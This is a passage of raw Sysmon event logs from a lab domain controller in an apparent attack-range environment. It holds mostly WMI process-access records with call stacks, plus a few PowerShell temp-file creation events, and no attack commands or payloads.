10341000x80000000000000002237641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.973{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.973{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-85AA-00000000AD01}15020C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.973{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-85AA-00000000AD01}15020C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.973{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.972{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.972{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.970{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.969{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.969{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.968{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.967{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.968{05ADC7E1-6D64-603E-85AA-00000000AD01}150203948C:\Windows\system32\conhost.exe{05ADC7E1-6D64-603E-84AA-00000000AD01}9536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.967{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.966{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.966{05ADC7E1-6D64-603E-82AA-00000000AD01}13276ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_k5pwc5a0.g0z.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.965{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.950{05ADC7E1-6D64-603E-82AA-00000000AD01}13276ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hqmeu5tk.jtw.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.950{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 